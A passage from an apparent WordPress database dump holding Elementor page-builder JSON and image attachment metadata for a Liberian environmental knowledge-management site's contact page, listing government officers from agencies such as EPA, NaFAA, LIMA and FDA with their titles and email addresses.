href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23221,3364,'_wp_attached_file','2021/01/lavalah.png'),(23222,3364,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:19:\"2021/01/lavalah.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"lavalah-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"lavalah-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23231,3367,'_wp_attached_file','2021/01/mr-wesseh.png'),(23232,3367,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:21:\"2021/01/mr-wesseh.png\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"mr-wesseh-300x279.png\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"mr-wesseh-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(23233,3368,'_elementor_edit_mode','builder'),(23234,3368,'_elementor_template_type','wp-page'),(23235,3368,'_elementor_version','3.0.16'),(23236,3368,'_wp_page_template','default'),(23237,3368,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br \\/>jcammue@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator\\/UNFCCC Focal Point<br \\/>bkarmorh@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator\\/UNCCD Focal Point<br \\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a 